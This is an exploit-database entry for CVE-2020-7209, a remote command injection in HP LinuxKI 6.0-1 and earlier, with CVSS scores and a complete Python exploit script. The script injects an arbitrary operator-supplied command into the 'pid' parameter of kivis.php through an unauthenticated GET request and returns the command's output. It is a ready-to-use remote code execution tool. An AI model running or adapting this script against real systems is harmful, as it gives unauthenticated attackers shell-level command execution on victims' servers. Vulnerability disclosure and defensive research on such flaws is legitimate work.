HP LinuxKI 6.01 Remote Command Injection

2020.05.19
Credit: Cody Winkler
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Exploit Title: HP LinuxKI 6.01 - Remote Command Injection Date: 2020-05-17 Exploit Author: Cody Winkler Vendor Homepage: https://www.hpe.com/us/en/home.html Software Link: https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-1 Version: <= v6.0-1 Tested on: LinuxKI Docker Image CVE: CVE-2020-7209 #!/usr/bin/env python3 import requests import argparse import sys import re def parse_options(): formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50) parser = argparse.ArgumentParser(description='HP LinuxKI <= 6.0-1 RCE - CVE-2020-7209', formatter_class=formatter) parser.add_argument("-i", "--ip", dest='host', type=str, help="Target Hostname/IP", required=True) parser.add_argument("-p", "--port", dest='port', type=str, help="Target Port", required=True) parser.add_argument("-c", "--cmd", dest='cmd', type=str, help="Command to execute", required=True) args = parser.parse_args() return args def main(args): host = args.host port = args.port cmd = args.cmd path = '/linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;%s;echo END;' % cmd rce = requests.get('http://' + host + ':' + port + path, verify=False) output = rce.text a, b = output.find('BEGIN'), output.find('END') print(output[a+6:b]) if __name__ in "__main__": args = parse_options() main(args)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top